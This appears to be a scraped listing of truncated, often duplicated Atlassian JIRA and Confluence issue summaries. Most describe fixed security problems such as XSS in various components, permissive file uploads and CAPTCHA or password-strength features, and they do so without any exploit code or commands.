sudo is decorated with global decorator

The reasoning behind preventing theme developers from theming the admin areas was because if you don't know what you are doing then you can mess things up to such an extent that you are unable to use confluence. By decorating the sudo login pages using the global decorator it exposes the user to...

Logout Button / Option Missing for some LDAP user accounts

Instance Details / Description: The logout option to kill sessions is not present for some user accounts i,e, the zzsvat01-05 test accounts. It is believed that this is caused by LDAP user accounts that don't have a first and / or last name present. For these specific rare instances i.e. probably...

Logout Button / Option Missing for some LDAP user accounts

Instance Details / Description: The logout option to kill sessions is not present for some user accounts i,e, the zzsvat01-05 test accounts. It is believed that this is caused by LDAP user accounts that don't have a first and / or last name present. For these specific rare instances i.e. probably...

Logout Button / Option Missing for some LDAP user accounts

Instance Details / Description: The logout option to kill sessions is not present for some user accounts i,e, the zzsvat01-05 test accounts. It is believed that this is caused by LDAP user accounts that don't have a first and / or last name present. For these specific rare instances i.e. probably...

Malicious File Upload

The application server accepted a vbscript file, an HTML file containing JavaScript, and the EICAR test virus as allowed attachments. This means that an attacker could submit a malicious file to the backend, where the file might be launched by another internal RIM employee if they click and open...

Malicious File Upload

The application server accepted a vbscript file, an HTML file containing JavaScript, and the EICAR test virus as allowed attachments. This means that an attacker could submit a malicious file to the backend, where the file might be launched by another internal RIM employee if they click and open...

XSS vulnerability in Clickr theme

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence Clickr theme. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An attacker...

XSS vulnerability in Clickr theme

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence Clickr theme. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An attacker...

XSS vulnerability in Clickr theme

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence Clickr theme. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An attacker...

XSS vulnerability in Contributors macro

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence \contributors macro. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An...

XSS vulnerability in Contributors macro

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence \contributors macro. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An...

XSS vulnerability in Contributors macro

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence \contributors macro. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An...

XSS vulnerability in PDF export

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence action that performs the export to PDF. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's o...

XSS vulnerability in PDF export

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence action that performs the export to PDF. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's o...

XSS vulnerability in PDF export

We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence action that performs the export to PDF. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's o...

Can not UPDATE the "Viewable By" field of an issue

After the creation of an issue it is by default viewable by "All Users". It is not possible to change the value after re-editing that issue. After changing it and clicking the "Update" button, the viewable by entry stays "All Users"...

Can not UPDATE the "Viewable By" field of an issue

After the creation of an issue it is by default viewable by "All Users". It is not possible to change the value after re-editing that issue. After changing it and clicking the "Update" button, the viewable by entry stays "All Users"...

Can not UPDATE the "Viewable By" field of an issue

After the creation of an issue it is by default viewable by "All Users". It is not possible to change the value after re-editing that issue. After changing it and clicking the "Update" button, the viewable by entry stays "All Users"...

WebSudo should be disabled in devmode

When confluence is started in dev mode, websudo should be disabled...

WebSudo should be disabled in devmode

When confluence is started in dev mode, websudo should be disabled...

XSS in mailpage plugin

XSS vulnerability has been reported against the mailpage plugin. It allows an attacker to execute arbitrary javascript. A new version of the issue has been released that fixes this problem...

XSS in mailpage plugin

XSS vulnerability has been reported against the mailpage plugin. It allows an attacker to execute arbitrary javascript. A new version of the issue has been released that fixes this problem...

XSS in mailpage plugin

XSS vulnerability has been reported against the mailpage plugin. It allows an attacker to execute arbitrary javascript. A new version of the issue has been released that fixes this problem...

Pluggable CAPTCHA

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Cloud. Using JIRA Server? See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-21359. panel CAPTCHA should be pluggable in JIRA CAPTCHA|http://en.wikipedia.org/wiki/CAPTCHA is supposed to stop spam and other automated...

Pluggable CAPTCHA

CAPTCHA should be pluggable in JIRA CAPTCHA|http://en.wikipedia.org/wiki/CAPTCHA is supposed to stop spam and other automated nefarious usage of systems. But there is an arms race of CAPTCHA breaking|http://www.slightlyshadyseo.com/index.php/xmcps-how-tobasic-captcha-cracking-techniques-part-1/ a...

Pluggable CAPTCHA

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Server. Using JIRA Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-21359. panel CAPTCHA should be pluggable in JIRA CAPTCHA|http://en.wikipedia.org/wiki/CAPTCHA is supposed to stop spam and other automated...

Password strength measurement and restriction

Enable password strength rules to tell the user the effective strength of the password they choose optionally allow administrators to restrict the minimum strength of passwords chosen by users be pluggable Currently you can enforce password strength by using JIRA with Crowd...

Password strength measurement and restriction

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Server. Using JIRA Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-21358. panel Enable password strength rules to tell the user the effective strength of the password they choose optionally allow administrato...

Password strength measurement and restriction

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Cloud. Using JIRA Server? See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-21358. panel Enable password strength rules to tell the user the effective strength of the password they choose optionally allow...

500page.jsp Improvements

Some further improvements to the 500page.jsp: The following should not appear if there is no stack trace: quote Cause Stack Trace:hide quote \ \ Stack trace should not appear if the user triggering the page is anonymous user Changes to this sentence below: quote"Your Confluence administrator can...

500page.jsp Improvements

panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Cloud. Using Confluence Server? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFSERVER-19601. panel Some further improvements to the 500page.jsp: The following should not appear if there is no stack trace: quote...

500page.jsp Improvements

panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Server. Using Confluence Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFCLOUD-19601. panel Some further improvements to the 500page.jsp: The following should not appear if there is no stack trace: quote Cau...

The system paths are to be locked down to the JIRA Home directory

Currently JIRA allows you to change system file paths at runtime. While convenient, this allowed an attacker to elevate his/her stolen system admin access into a situation where he/her can execute arbitrary code. A decision has been made to remove the ability to set the paths at run time. For new...

The system paths are to be locked down to the JIRA Home directory

Currently JIRA allows you to change system file paths at runtime. While convenient, this allowed an attacker to elevate his/her stolen system admin access into a situation where he/her can execute arbitrary code. A decision has been made to remove the ability to set the paths at run time. For new...

XSS in page renderer

An XSS vulnerability has been identified in the page renderer. This issue provides a fix for this problem. The severity of this issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for other security related issues as well as more information on how we rate issues...

XSS in page renderer

An XSS vulnerability has been identified in the page renderer. This issue provides a fix for this problem. The severity of this issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for other security related issues as well as more information on how we rate issues...

XSS in page renderer

An XSS vulnerability has been identified in the page renderer. This issue provides a fix for this problem. The severity of this issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for other security related issues as well as more information on how we rate issues...

Put a new security log into JIRA so that important events can be specifically logged

The idea is to have a specific atlassian-jira-security.log that contains important events such as user logged in, logged out, session created and so on. This would allow for more specific information about how is logged into JIRA and when. This has been mooted for a while and is now being done in...

Put a new security log into JIRA so that important events can be specifically logged

The idea is to have a specific atlassian-jira-security.log that contains important events such as user logged in, logged out, session created and so on. This would allow for more specific information about how is logged into JIRA and when. This has been mooted for a while and is now being done in...

XSS vulnerability in some JSPs under admin section

Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...

XSS vulnerability in some JSPs under admin section

Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...

XSS vulnerability in some JSPs under admin section

Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...

Only strings are encoded

The XML encoder only encodes strings. This could make Confluence return non encoded content. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issue and more information on how we rate issues...

Only strings are encoded

The XML encoder only encodes strings. This could make Confluence return non encoded content. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issue and more information on how we rate issues...

Only strings are encoded

The XML encoder only encodes strings. This could make Confluence return non encoded content. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issue and more information on how we rate issues...

SOAP and XML-RPC APIs return too much information

The SOAP and XML-RPC APIs return more information than is needed. This issue corrects that problem. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issues and information on how we rate our issues...

SOAP and XML-RPC APIs return too much information

The SOAP and XML-RPC APIs return more information than is needed. This issue corrects that problem. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issues and information on how we rate our issues...

Path for daily backup is configurable through WEB UI

It is possible to set the daily backup path and partial name through the web UI. This could mean that information can be obtained by a rouge admin. This issue addresses that by introducing a flag so concerned administrators can remove this feature. This flag is set to false by default meaning it ...

Path for daily backup is configurable through WEB UI

It is possible to set the daily backup path and partial name through the web UI. This could mean that information can be obtained by a rouge admin. This issue addresses that by introducing a flag so concerned administrators can remove this feature. This flag is set to false by default meaning it ...

Require user to answer CAPTCHA after three failed attempts

Require user to answer CAPTCHA after three failed attempts. For SOAP and XMLRPC this means that the user will have to open a browser to answer the CAPTCHA, similar to how google does it. This issue has been rated MODERATE. Please refer to http://confluence.atlassian.com/x/ZILmD for details on oth...